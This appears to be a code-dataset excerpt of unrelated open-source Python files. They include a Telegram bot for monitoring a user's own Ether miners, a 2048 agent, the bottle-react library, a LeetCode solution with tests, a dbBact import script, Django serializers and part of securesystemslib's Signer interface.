`{humanize_iso_date(data[\"nanopool\"][\"last_payment\"][\"date\"])}`\\n' \\\n f' - Value: `{data[\"nanopool\"][\"last_payment\"][\"value\"]} ETH`\\n\\n' \\\n f'*Workers*\\n' + \\\n '\\n'.join(f' - {w}: `{v} MH/s`' for w, v in data['nanopool']['workers'].items())\n except peewee.DoesNotExist:\n self.logger.error('Chat unregistered')\n response_text = 'Configure me first'\n except BarreneroRequestException as e:\n self.logger.exception(e.message)\n response_text = e.message\n except:\n response_text = 'Cannot retrieve Nanopool info'\n self.logger.exception('Barrenero API wrong response for Nanopool info: %s', str(data))\n\n bot.edit_message_text(text=response_text, parse_mode=ParseMode.MARKDOWN, chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n\n def ether_miner_choice(self, bot, update, groups):\n \"\"\"\n Call for Ether miner status and restarting service.\n \"\"\"\n query = update.callback_query\n action = groups[0]\n chat_id = query.message.chat_id\n bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n try:\n chat = Chat.get(id=chat_id)\n except peewee.DoesNotExist:\n chat = False\n\n if chat:\n buttons = [InlineKeyboardButton(api.name, callback_data=f'[ether_{action}][{api.id}]')\n for api in chat.apis if api.superuser]\n keyboard = [buttons[i:max(len(buttons), i + 4)] for i in range(0, len(buttons), 4)]\n reply_markup = InlineKeyboardMarkup(keyboard)\n else:\n reply_markup = None\n\n if reply_markup:\n bot.edit_message_text(text='Select miner:', reply_markup=reply_markup, chat_id=chat_id,\n message_id=query.message.message_id)\n else:\n bot.edit_message_text(text='No options available', chat_id=chat_id, message_id=query.message.message_id)\n\n def ether_restart(self, bot, update, groups):\n \"\"\"\n Restart ether service.\n \"\"\"\n query = update.callback_query\n api_id = groups[0]\n chat_id = query.message.chat_id\n\n bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n\n try:\n api = API.get(id=api_id)\n Barrenero.restart(api.url, api.token, 'Ether')\n\n response_text = f'*API {api.name}*\\n' \\\n f'Restarting Ether.'\n except peewee.DoesNotExist:\n self.logger.error('Chat unregistered')\n response_text = 'Configure me first'\n except BarreneroRequestException as e:\n self.logger.exception(e.message)\n response_text = e.message\n except:\n self.logger.exception('Cannot restart API %s Ether miner', api.name)\n response_text = f'*API {api.name} - Ether miner*\\nCannot restart miner'\n\n bot.edit_message_text(text=response_text, parse_mode=ParseMode.MARKDOWN, chat_id=chat_id,\n message_id=query.message.message_id)\n\n def ether_status(self, bot, update, groups):\n \"\"\"\n Check Ether miner status.\n \"\"\"\n query = update.callback_query\n api_id = groups[0]\n chat_id = query.message.chat_id\n\n bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n\n try:\n api = API.get(id=api_id)\n\n data = Barrenero.ether(api.url, api.token)\n\n response_text = f'*API {api.name}*\\n' \\\n f'*Ether miner*\\n' \\\n f' - Status: {data[\"active\"]}\\n\\n' \\\n f'*Hashrate*\\n' \\\n + '\\n'.join([f' - Graphic card #{h[\"graphic_card\"]}: `{h[\"hashrate\"]:.2f} MH/s`'\n for h in data['hashrate']])\n except peewee.DoesNotExist:\n self.logger.error('Chat unregistered')\n response_text = 'Configure me first'\n except BarreneroRequestException as e:\n self.logger.exception(e.message)\n response_text = f'*API {api.name} - Ether miner*\\n{e.message}'\n except:\n response_text = f'*API {api.name} - Ether miner*\\nCannot retrieve Ether miner status'\n self.logger.exception('Barrenero API wrong response for Ether miner status: %s', str(data))\n\n bot.edit_message_text(text=response_text, parse_mode=ParseMode.MARKDOWN, chat_id=chat_id,\n message_id=query.message.message_id)\n\n def ether_job_status(self, bot, job):\n \"\"\"\n Check miner status\n \"\"\"\n self.logger.debug('Job: Check Ether status')\n\n # Create new state machines\n global status_machines\n\n with lock:\n new_machines = {a: StatusStateMachine('Ether', a.name)\n for a in API.select().where(API.superuser == True).join(Chat)\n if a not in status_machines}\n status_machines.update(new_machines)\n\n self.logger.debug('Ether Status Machines: %s', str(status_machines))\n for api, status in status_machines.items():\n try:\n data = Barrenero.ether(api.url, api.token)\n\n if data['active']:\n status.start(bot=bot, chat=api.chat.id)\n else:\n status.stop(bot=bot, chat=api.chat.id)\n except BarreneroRequestException:\n if status.is_active:\n bot.send_message(api.chat.id, f'Cannot access `{api.name}`', parse_mode=ParseMode.MARKDOWN)\n status.stop(bot=bot, chat=api.chat.id)\n\n def add_ether_command(self):\n self.updater.dispatcher.add_handler(CommandHandler('ether', self.ether))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.ether_restart, pass_groups=True,\n pattern=r'\\[ether_restart\\]\\[(\\d+)\\]'))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.ether_status, pass_groups=True,\n pattern=r'\\[ether_status\\]\\[(\\d+)\\]'))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.ether_miner_choice, pass_groups=True,\n pattern=r'\\[ether_(restart|status)\\]$'))\n self.updater.dispatcher.add_handler(CallbackQueryHandler(self.ether_nanopool, pattern=r'\\[ether_nanopool\\]'))\n\n def add_ether_jobs(self):\n self.updater.job_queue.run_repeating(self.ether_job_status, interval=180.0)\n","repo_name":"perdy/barrenero-telegram","sub_path":"bot/mixins/ether.py","file_name":"ether.py","file_ext":"py","file_size_in_byte":9579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15498768873","text":"import time\nfrom abc import ABC, abstractmethod\nfrom typing import Union, Tuple\n\nfrom src.game.controller.game import Game\nfrom src.game.utils import UP, DOWN, LEFT, RIGHT\nfrom src.game.view.gameUI import GameUI\n\n\nclass Player(ABC):\n def __init__(self, game: Game, quiet: bool = False, ui: bool = True) -> None:\n \"\"\"\n Init function for Player Class\n :param game: Game: game object\n :param quiet: bool: quiet mode, whether you want messages to be printed\n \"\"\"\n self.ui = ui\n self._game = game\n self._quiet = quiet\n\n @abstractmethod\n def get_move(self) -> Union[UP, DOWN, LEFT, RIGHT]:\n \"\"\"\n :return: direction of movement: Union[UP, DOWN, LEFT, RIGHT]\n \"\"\"\n raise NotImplementedError\n\n def run(self, fps: int = 30) -> Tuple[int, int, float]:\n \"\"\"\n main logic for running the game\n :param fps: int: frame per second of animation\n :return: Tuple[score, max value reached, runtime used]\n \"\"\"\n game_ui = GameUI(game=self._game, fps=fps) if self.ui else None\n self._game.restart()\n if self.ui:\n game_ui.update_ui()\n iteration = 0\n t_0 = time.time()\n while not self._game.get_is_done():\n move = self.get_move()\n self._game.move(move)\n if self.ui:\n game_ui.update_ui()\n if self._game.get_is_done():\n if not self._quiet:\n print(\n f\"done, {iteration} iterations, score: {self._game.get_score()}, \"\n f\"{round(time.time() - t_0, 2)}s, max value: {self._game.get_max_val()}\")\n break\n if self._game.has_won():\n if not self._quiet:\n print(\n f\"won, {iteration} iterations, score: {self._game.get_score()}, \"\n f\"{round(time.time() - t_0, 2)}s, max value: {self._game.get_max_val()}\")\n break\n iteration += 1\n return self._game.get_score(), self._game.get_max_val(), time.time() - t_0\n","repo_name":"HuakunShen/2048AI","sub_path":"src/agent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6037985243","text":"# Tuples ar immutables\r\n\r\ninformations = \"Matheus\", \"00/00/2022\", \"00/20/2022\", 2000, \"Employee\"\r\nprint(informations)\r\n\r\nname = informations[0]\r\nwas_born = informations[1]\r\nnumber = informations[3]\r\n\r\nprint(name, was_born, number)\r\n\r\n# OR\r\n# Unpacking\r\n\r\nname, was_born, birthday, number, office = informations\r\n\r\n#\r\n\r\nsales = [100, 200, 300, 400, 500]\r\nemployees = [\"João\", \"Matheus\", \"Lucas\", \"Bruno\", \"Pedro\"]\r\n\r\nfor i, sale in enumerate(sales):\r\n # for item in enumerate(sales):\r\n # print(item) → Tuples (0, 100)\r\n print(f\"{employees[i]} sold {sale} unities\")","repo_name":"franssa01/Courses","sub_path":"Hashtag Programação/Python Impressionador/08 Tuples/Classes/CL027 Tuples.py","file_name":"CL027 Tuples.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32955696204","text":"__all__ = [\"RepeatedSeparatedParser\", \"repsep\", \"RepeatedOnceSeparatedParser\", \"rep1sep\"]\n\nfrom typing import Any, Generic, Optional, Sequence, Union\n\nfrom ..state import Continue, Input, Output, Reader, RecursionError, State\nfrom ._base import Parser, wrap_literal\n\n\nclass RepeatedSeparatedParser(Generic[Input, Output], Parser[Input, Sequence[Output]]):\n def __init__(\n self,\n parser: Parser[Input, Output],\n separator: Parser[Input, Any],\n *,\n min: int = 0,\n max: Optional[int] = None,\n ):\n super().__init__()\n self.parser = parser\n self.separator = separator\n self.min = min\n self.max = max\n\n def _consume(self, state: State[Input], reader: Reader[Input]):\n status = self.parser.consume(state, reader)\n\n if not isinstance(status, Continue):\n output = []\n remainder = reader\n else:\n output = [status.value]\n remainder = status.remainder\n while self.max is None or len(output) < self.max:\n # If the separator matches, but the parser does not, the\n # remainder from the last successful parser step must be used,\n # not the remainder from any separator. That is why the parser\n # starts from the remainder on the status, but remainder is not\n # updated until after the parser succeeds.\n status = self.separator.consume(state, remainder)\n if isinstance(status, Continue):\n status = self.parser.consume(state, status.remainder)\n if isinstance(status, Continue):\n if remainder.position == status.remainder.position:\n raise RecursionError(self, remainder)\n\n remainder = status.remainder\n output.append(status.value)\n else:\n break\n else:\n break\n\n if len(output) >= self.min:\n return Continue(remainder, output)\n else:\n return None\n\n def __repr__(self):\n rep_string = self.parser.name_or_repr()\n sep_string = self.separator.name_or_repr()\n min_string = f\", min={self.min}\" if self.min > 0 else \"\"\n max_string = f\", max={self.max}\" if self.max is not None else \"\"\n string = f\"repsep({rep_string}, {sep_string}{min_string}{max_string})\"\n return self.name_or_nothing() + string\n\n\ndef repsep(\n parser: Union[Parser[Input, Output], Sequence[Input]],\n separator: Union[Parser[Input, Any], Sequence[Input]],\n *,\n min: int = 0,\n max: Optional[int] = None,\n) -> RepeatedSeparatedParser[Input, Output]:\n \"\"\"Match a parser zero or more times separated by another parser.\n\n This matches repeated sequences of ``parser`` separated by ``separator``. A\n list is returned containing the value from each match of ``parser``. The\n values from ``separator`` are discarded. If there are no matches, an empty\n list is returned.\n\n Args:\n parser: Parser or literal\n separator: Parser or literal\n min: Nonnegative integer defining the minimum number of entries matched\n before the parser can succeed\n max: Nonnegative integer defining the maximum number of entries that\n will be matched or ``None``, meaning that there is no limit\n \"\"\"\n return RepeatedSeparatedParser(wrap_literal(parser), wrap_literal(separator), min=min, max=max)\n\n\nclass RepeatedOnceSeparatedParser(Generic[Input, Output], Parser[Input, Sequence[Output]]):\n def __init__(self, parser: Parser[Input, Output], separator: Parser[Input, Any]):\n super().__init__()\n self.parser = parser\n self.separator = separator\n\n def _consume(self, state: State[Input], reader: Reader[Input]):\n status = self.parser.consume(state, reader)\n\n if status is None:\n return None\n else:\n output = [status.value]\n remainder = status.remainder\n while True:\n # If the separator matches, but the parser does not, the\n # remainder from the last successful parser step must be used,\n # not the remainder from any separator. That is why the parser\n # starts from the remainder on the status, but remainder is not\n # updated until after the parser succeeds.\n status = self.separator.consume(state, remainder)\n if isinstance(status, Continue):\n status = self.parser.consume(state, status.remainder)\n if isinstance(status, Continue):\n if remainder.position == status.remainder.position:\n raise RecursionError(self, remainder)\n\n remainder = status.remainder\n output.append(status.value)\n else:\n return Continue(remainder, output)\n else:\n return Continue(remainder, output)\n\n def __repr__(self):\n string = f\"rep1sep({self.parser.name_or_repr()}, {self.separator.name_or_repr()})\"\n return self.name_or_nothing() + string\n\n\ndef rep1sep(\n parser: Union[Parser[Input, Output], Sequence[Input]],\n separator: Union[Parser[Input, Any], Sequence[Input]],\n) -> RepeatedOnceSeparatedParser[Input, Output]:\n \"\"\"Match a parser one or more times separated by another parser.\n\n This matches repeated sequences of ``parser`` separated by ``separator``.\n If there is at least one match, a list containing the values of the\n ``parser`` matches is returned. The values from ``separator`` are discarded.\n If it does not match ``parser`` at all, it fails.\n\n Args:\n parser: Parser or literal\n separator: Parser or literal\n \"\"\"\n return RepeatedOnceSeparatedParser(wrap_literal(parser), wrap_literal(separator))\n","repo_name":"drhagen/parsita","sub_path":"src/parsita/parsers/_repeated_seperated.py","file_name":"_repeated_seperated.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"21"} +{"seq_id":"24682289163","text":"from __future__ import print_function\n\nimport collections, json, os, re, shutil, subprocess\ntry:\n import bottle\n import react.jsx\nexcept ImportError:\n pass # need to not error here for setup.py to get the version\n\n# python3 compat.\ntry:\n basestring\nexcept NameError:\n basestring = str\n\n__version__='0.5.0'\n\n\nFLASK_AROUND = False\ntry:\n import flask\n FLASK_AROUND = True\nexcept ImportError:\n pass\n\n\n\n__ALL__ = ['BottleReact','__version__']\nBABEL_CORE = 'https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.8.24/browser.min.js'\n\nclass BottleReact(object):\n \n def __init__(self, app, prod=False, jsx_path='jsx', asset_path='assets', work_path='/tmp/bottlereact', verbose=None, default_render_html_kwargs=None, harmony=True):\n self.app = app\n self.prod = prod\n self.verbose = not prod if verbose is None else verbose\n self.default_render_html_kwargs = default_render_html_kwargs\n self.jsx_path = jsx_path\n self.hashed_path = os.path.join(work_path, 'hashed-assets')\n self.genned_path = os.path.join(work_path, 'genned-assets')\n self.asset_path = asset_path\n self.harmony = harmony\n self._reqs = collections.defaultdict(list)\n \n if not os.path.isdir(self.jsx_path):\n raise Exception('Directory %s not found - please create it or set the jsx_path parameter.' % repr(self.jsx_path))\n \n if FLASK_AROUND and isinstance(app, flask.app.Flask):\n if self.prod:\n @app.route('/__br_assets__/')\n def _serve__br_assets(path):\n response = flask.send_from_directory(self.hashed_path, path)\n response.headers[\"Cache-Control\"] = \"public, max-age=31536000\" # one year\n return response\n else:\n @app.route('/__br_assets__/')\n def _serve__br_assets(path):\n if path=='bottlereact.js':\n return flask.Response(bottlereact_js, mimetype='text/javascript')\n elif path.endswith('.jsx'):\n response = flask.make_response(flask.send_from_directory(self.jsx_path, path))\n response.headers['Content-Type'] = 'text/babel'\n return response\n else:\n return flask.send_from_directory(self.asset_path, path)\n else:\n if self.prod:\n @app.get('/__br_assets__/')\n def _serve__br_assets(path):\n response = bottle.static_file(path, root=self.hashed_path)\n response.set_header(\"Cache-Control\", \"public, max-age=31536000\") # one year\n return response\n else:\n @app.get('/__br_assets__/')\n def _serve__br_assets(path):\n if path=='bottlereact.js':\n bottle.response.set_header('Content-Type', 'text/javascript')\n return bottlereact_js\n elif path.endswith('.jsx'):\n bottle.response.set_header('Content-Type', 'text/babel')\n return bottle.static_file(path, root=self.jsx_path)\n else:\n return bottle.static_file(path, root=self.asset_path)\n\n\n # load all JSX files\n classes_by_file = collections.defaultdict(list)\n for fn in sorted(os.listdir(self.jsx_path)):\n if not fn.endswith('.jsx'): continue\n with open(os.path.join(self.jsx_path, fn), 'r') as f:\n for line in f.readlines():\n if 'React.createClass' in line:\n if '=' not in line: continue\n react_class = line.split('=')[0].strip().split()[-1]\n classes_by_file[fn].append(react_class)\n self.__dict__[react_class] = _ReactClass(react_class, fn)\n if 'extends React.Component' in line:\n if 'class' not in line: continue\n react_class = line[line.find('class')+5:line.find('extends')].strip()\n classes_by_file[fn].append(react_class)\n self.__dict__[react_class] = _ReactClass(react_class, fn)\n if line.startswith('// require '):\n req = line[len('// require '):].strip()\n self._reqs[fn].append(req)\n\n if self.verbose:\n print('BR classes by file:', dict(classes_by_file.items()))\n\n self._fn2hash = {}\n if prod:\n transformer = react.jsx.JSXTransformer()\n \n # confirm tmp paths exist\n for path in [self.hashed_path, self.genned_path]:\n if not os.path.isdir(path):\n os.makedirs(path)\n\n # unfiltered assets\n self._fn2hash = self._load_fn_to_hash_mapping(self.asset_path, '*', dest=self.hashed_path)\n\n # jsx assets\n jsx2hash = self._load_fn_to_hash_mapping(self.jsx_path, '*.jsx', dest=self.genned_path)\n for jsx_fn, jsx_hashed_fn in jsx2hash.items():\n jsx_converted_fn = os.path.join(self.genned_path, jsx_hashed_fn[:-1])\n if not os.path.exists(jsx_converted_fn) or os.stat(jsx_converted_fn).st_size==0:\n transformer.transform(os.path.join(self.genned_path, jsx_hashed_fn), js_path=jsx_converted_fn, harmony=self.harmony)\n\n # bottlereact.js\n with open(os.path.join(self.genned_path, 'bottlereact.js'),'w') as f:\n f.write(bottlereact_js)\n f.write('\\nbottlereact._assets = ')\n json.dump(self._fn2hash, f)\n f.write(';\\n')\n\n # add the jsx files (which are only used server side, so not written to 'bottlereact.js')\n jsxjs2hash = self._load_fn_to_hash_mapping(self.genned_path, '*.js', dest=self.hashed_path)\n for k,v in jsx2hash.items():\n self._fn2hash[k] = jsxjs2hash[v[:-1]]\n\n # get the hashed name of 'bottlereact.js'\n self._fn2hash['bottlereact.js'] = jsxjs2hash['bottlereact.js']\n\n if self.verbose: print('BR file hashes:', self._fn2hash)\n\n if self.verbose: print('BR file requirements: ', dict(self._reqs.items()))\n\n\n def _build_dep_list(self, files):\n files = set(files)\n deps = collections.OrderedDict()\n while len(files):\n fn = files.pop()\n if fn not in deps:\n deps[fn] = True\n for fn2 in self._reqs[fn]:\n files.add(fn2)\n deps['bottlereact.js'] = True\n if not self.prod:\n deps[BABEL_CORE] = True\n return list(reversed(deps.keys()))\n\n def get_asset_path(self, fn):\n return '/__br_assets__/%s' % self._fn2hash.get(fn, fn)\n\n def _load_fn_to_hash_mapping(self, path, selector, dest=None):\n path = os.path.abspath(path)\n ret = {}\n if not os.path.isdir(path): return ret\n if not os.listdir(path): return ret\n output = subprocess.check_output(['find %s -name \\'%s\\' -type f -print0 | xargs -0 -n 100 sha256sum' % (path, selector)], shell=True)\n for line in output.decode(\"utf8\").split('\\n'):\n line = line.strip()\n if not line: continue\n hsh, fn = line.split(' ', 1)\n hsh = hsh[:16]\n base_fn = os.path.relpath(fn, path)\n hashed_fn = '%s-%s' % (hsh, base_fn.replace('/','__'))\n ret[base_fn] = hashed_fn\n tmp_fn = os.path.join(dest, hashed_fn)\n if not os.path.exists(tmp_fn):\n shutil.copy(fn, tmp_fn)\n if self.verbose: print('BR copied', fn, 'to', tmp_fn)\n return ret\n \n def calc_render_html_kwargs(self, kwargs):\n if self.default_render_html_kwargs is None:\n return kwargs\n if hasattr(self.default_render_html_kwargs, '__call__'):\n ret = self.default_render_html_kwargs()\n else:\n ret = dict(self.default_render_html_kwargs.items())\n ret.update(kwargs)\n return ret\n\n def render_html(self, react_node, **kwargs):\n kwargs = self.calc_render_html_kwargs(kwargs)\n template = kwargs.get('template', 'bottlereact')\n react_js = react_node.to_javascript()\n deps = self._build_dep_list(react_node.get_js_files())\n classes = _make_json_string_browser_safe(json.dumps(list(react_node.get_react_classes())))\n deps_html = ['']\n for dep in deps:\n path = dep if dep.startswith('http://') or dep.startswith('https://') else self.get_asset_path(dep)\n if path.endswith('.css'):\n deps_html.append('' % bottle.html_escape(path))\n elif path.endswith('.js'):\n deps_html.append('' % bottle.html_escape(path))\n elif path.endswith('.jsx'):\n deps_html.append('' % bottle.html_escape(path))\n else: # assume javascript\n deps_html.append('' % bottle.html_escape(path))\n deps_html = '\\n'.join(deps_html)\n init = '''\n \n ''' % (classes, react_js)\n if 'title' not in kwargs: kwargs['title'] = 'bottle-react - https://github.com/keredson/bottle-react'\n kwargs.update({\n 'deps': deps_html,\n 'init': init,\n 'prod': self.prod,\n 'asset_path': self.get_asset_path,\n })\n return bottle.template(template, **kwargs)\n\n\ndef _make_json_string_browser_safe(s):\n return s.replace(' count: del ret[-1] # delete the last comma\n ret.append(']')\n ret.append(')')\n return ''.join(ret)\n\n\nclass _ReactClass(object):\n def __init__(self, name, fn):\n if not re.match(\"^[A-Za-z][_a-zA-Z0-9]*$\", name):\n raise Exception('%s is not a valid javascript identifier' % name)\n self.name = name\n self.fn = fn\n self.default_props = dict\n try:\n import jsx_props\n self.default_props = jsx_props.__dict__.get('init%s'%name, dict)\n except ImportError:\n pass\n def __call__(self, props=None, children=None):\n '''\n props must be a dict or None\n children must be a list of ReactNode objects, or None\n '''\n return _ReactNode(self, props, children)\n\n\n\nbottlereact_js = '''\nvar pending_deps = [];\nvar checkDeps = function() {\n for (var i=0; i int:\n li = list(map(int, str(num)))\n index = {x:i for i,x in enumerate(li)}\n for i,x in enumerate(li):\n for y in reversed(range(10)):\n if y in index and index[y]>i and y>x:\n li[i],li[index[y]] = li[index[y]],li[i]\n return int(''.join(map(str,li)))\n return num\nclass Solution2:\n def maximumSwap(self, num: int) -> int:\n li = list(str(num))\n temp = li[:]\n i=0\n while temp:\n maxx = max(temp)\n if maxx!=li[i]:\n break\n temp.remove(maxx)\n i+=1\n if not temp: return num\n idx=li[::-1].index(maxx) # get the last max if multiple. that's why reversed\n idx = len(li)-1-idx\n li[i],li[idx]=li[idx],li[i]\n li = ''.join(li)\n li = int(li)\n return li\nclass Solution3:\n def maximumSwap(self, num: int) -> int:\n li=[int(c) for c in str(num)]\n n=len(li)\n\n leftMin=[[float('inf'),-1]]*n\n minn=float('inf')\n for i in range(n):\n if li[i]maxx:\n maxx=li[i]\n rightMax[i]=[maxx,i]\n else:\n rightMax[i]=rightMax[i+1]\n i=0\n while i=rightMax[i][0]:\n i+=1\n if i==len(li): return num\n leftIdx=leftMin[i][1]\n rightIdx=rightMax[i][1]\n li[leftIdx],li[rightIdx]=li[rightIdx],li[leftIdx]\n return int(''.join(map(str,li)))\nclass tester(unittest.TestCase):\n def test01(self):\n self.assertEqual(0, get_sol().maximumSwap(0))\n def test02(self):\n self.assertEqual(1, get_sol().maximumSwap(1))\n def test03(self):\n self.assertEqual(98, get_sol().maximumSwap(98))\n def test04(self):\n self.assertEqual(98, get_sol().maximumSwap(89))\n def test05(self):\n self.assertEqual(88, get_sol().maximumSwap(88))\n def test06(self):\n self.assertEqual(7236, get_sol().maximumSwap(2736))\n def test07(self):\n self.assertEqual(9973, get_sol().maximumSwap(9973))\n def test08(self):\n self.assertEqual(999, get_sol().maximumSwap(999))\n def test09(self):\n self.assertEqual(98863, get_sol().maximumSwap(98368))\n def test10(self):\n self.assertEqual(511, get_sol().maximumSwap(115))\n def test11(self):\n self.assertEqual(90909011, get_sol().maximumSwap(10909091))\n def test12(self):\n self.assertEqual(99910, get_sol().maximumSwap(99901))\n def test13(self):\n self.assertEqual(63454, get_sol().maximumSwap(43456))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc670.py","file_name":"lc670.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10699026254","text":"#!/usr/bin/env python\n\n# Put all dbBact sequences in to the sequence translator update queue\n# need to run after adding a new whole seq database / region\n\n'''Put all dbBact sequences in to the sequence translator update queue\nneed to run after adding a new whole seq database / region\n'''\n\nimport sys\nimport requests\n\nimport argparse\nimport setproctitle\n\nfrom dbbact_server import db_access\nfrom dbbact_server.utils import debug, SetDebugLevel\n\n__version__ = \"0.9\"\n\n\ndef add_seq_counts(con, cur, seq_trans_addr='http://127.0.0.1:5021'):\n\tdebug(3, 'import_all_seqs started')\n\tdebug(2, 'processing sequences')\n\tcur.execute('SELECT id, sequence FROM SequencesTable')\n\tseq_info = {}\n\tfor cres in cur:\n\t\tcid = cres['id']\n\t\tcseq = cres['sequence']\n\t\tseq_info[cid] = cseq\n\tdebug(2, 'found %d sequences' % len(seq_info))\n\tdebug(2, 'adding to newsequencestable using rest-api')\n\tres = requests.post(seq_trans_addr + '/add_sequences_to_queue', json={'seq_info': seq_info})\n\tif res.status_code != 200:\n\t\tdebug(5, 'failed! %s' % res.content)\n\tdebug(3, 'done')\n\n\ndef main(argv):\n\tparser = argparse.ArgumentParser(description='import all sequences from dbbact into sequence_translator. version ' + __version__)\n\tparser.add_argument('--port', help='postgres port', default=5432, type=int)\n\tparser.add_argument('--host', help='postgres host', default=None)\n\tparser.add_argument('--database', help='postgres database', default='dbbact')\n\tparser.add_argument('--user', help='postgres user', default='dbbact')\n\tparser.add_argument('--password', help='postgres password', default='magNiv')\n\tparser.add_argument('--proc-title', help='name of the process (to view in ps aux)')\n\tparser.add_argument('--debug-level', help='debug level (1 for debug ... 9 for critical)', default=2, type=int)\n\tparser.add_argument('--seq-trans-addr', help='sequence translator rest-api address', default='http://127.0.0.1:5021')\n\targs = parser.parse_args(argv)\n\n\tSetDebugLevel(args.debug_level)\n\t# set the process name for ps aux\n\tif args.proc_title:\n\t\tsetproctitle.setproctitle(args.proc_title)\n\n\tcon, cur = db_access.connect_db(database=args.database, user=args.user, password=args.password, port=args.port, host=args.host)\n\tadd_seq_counts(con, cur, seq_trans_addr=args.seq_trans_addr)\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","repo_name":"amnona/dbbact-sequence-translator","sub_path":"scripts/import_all_seqs.py","file_name":"import_all_seqs.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1347114651","text":"#!/usr/bin/env python3\n\nwith open('../input.txt') as f:\n content = f.readlines()\n\ndef location_within_region(x, y, points):\n LIMIT = 10_000\n return sum([dist(x, y, p_x, p_y) for p_x, p_y in points.values()]) < LIMIT\n\ndef dist(x_1, y_1, x_2, y_2):\n return abs(x_1 - x_2) + abs(y_1 - y_2)\n\nGRID_WIDTH = 500\nGRID_HEIGHT = 500\n\npoints = {(i + 1): tuple(int(x) for x in line.split(',')) for i, line in enumerate(content)}\n\narea_tally = 0\n\nfor x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if (location_within_region(x, y, points)):\n area_tally += 1\n\nprint(area_tally)\n","repo_name":"jpcornwell/advent-of-code","sub_path":"4-2018/06-Day/py/2-part.py","file_name":"2-part.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18612680590","text":"from rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\n\nfrom .models import Products, ProductsCategory\n\n\nclass CategorySerializers(serializers.ModelSerializer):\n class Meta:\n model = ProductsCategory\n\n fields = ['id', 'name']\n extra_kwargs = {'name': {'required': True}}\n\n\nclass ProductsSerializers(serializers.ModelSerializer):\n class Meta:\n model = Products\n category = CategorySerializers(read_only=True)\n include_fk = True\n fields = ['id', 'category', 'name', 'count']\n extra_kwargs = {\n 'category': {'required': True},\n 'name': {'required': True},\n 'count': {'required': True}\n }\n\nclass SaleSerializer(serializers.ModelSerializer):\n class Meta:\n model = Products\n fields = ['id', 'count']\n\n def update(self, instance, validated_data):\n count = validated_data.get('count')\n prod = super(SaleSerializer, self).update(instance, validated_data)\n if count:\n prod.set_count(validated_data.get('count'))\n prod.save()\n return prod\n","repo_name":"Nigar-mr/Rest-Api-Task","sub_path":"app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33131568228","text":"\"\"\"Signer interface and the default implementations\"\"\"\n\nimport logging\nimport os\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Callable, Dict, Optional, Type\nfrom urllib import parse\n\nimport securesystemslib.keys as sslib_keys\nfrom securesystemslib.signer._key import Key, SSlibKey\nfrom securesystemslib.signer._signature import Signature\n\nlogger = logging.getLogger(__name__)\n\n# NOTE Signer dispatch table is defined here so it's usable by Signer,\n# but is populated in __init__.py (and can be appended by users).\nSIGNER_FOR_URI_SCHEME: Dict[str, Type] = {}\n\n\n# SecretsHandler is a function the calling code can provide to Signer:\n# SecretsHandler will be called if Signer needs additional secrets.\n# The argument is the name of the secret (\"PIN\", \"passphrase\", etc).\n# Return value is the secret string.\nSecretsHandler = Callable[[str], str]\n\n\nclass Signer(metaclass=ABCMeta):\n \"\"\"Signer interface that supports multiple signing implementations.\n\n Usage example:\n\n signer = Signer.from_priv_key_uri(\"envvar:MYPRIVKEY\", pub_key)\n sig = signer.sign(b\"data\")\n\n Note that signer implementations may raise errors (during both\n Signer.from_priv_key_uri() and Signer.sign()) that are not documented here:\n examples could include network errors or file read errors. Applications\n should use generic try-except here if unexpected raises are not an option.\n\n See SIGNER_FOR_URI_SCHEME for supported private key URI schemes. The\n currently supported default schemes are:\n * envvar: see SSlibSigner for details\n * file: see SSlibSigner for details\n\n Interactive applications may also define a secrets handler that allows\n asking for user secrets if they are needed:\n\n from getpass import getpass\n\n def sec_handler(secret_name:str) -> str:\n return getpass(f\"Enter {secret_name}: \")\n\n # user will not be asked for a passphrase for unencrypted key\n uri = \"file:keys/mykey?encrypted=false\"\n signer = Signer.from_priv_key_uri(uri, pub_key, sec_handler)\n\n # user will be asked for a passphrase for encrypted key\n uri2 = \"file:keys/myenckey?encrypted=true\"\n signer2 = Signer.from_priv_key_uri(uri2, pub_key2, sec_handler)\n\n Applications can provide their own Signer and Key implementations:\n\n from securesystemslib.signer import Signer, SIGNER_FOR_URI_SCHEME\n from mylib import MySigner\n\n SIGNER_FOR_URI_SCHEME[MySigner.MY_SCHEME] = MySigner\n\n This way the application code using signer API continues to work with\n default signers but now also uses the custom signer when the proper URI is\n used.\n \"\"\"\n\n @abstractmethod\n def sign(self, payload: bytes) -> Signature:\n \"\"\"Signs a given payload by the key assigned to the Signer instance.\n\n Arguments:\n payload: The bytes to be signed.\n\n Returns:\n Returns a \"Signature\" class instance.\n \"\"\"\n raise NotImplementedError # pragma: no cover\n\n @classmethod\n @abstractmethod\n def 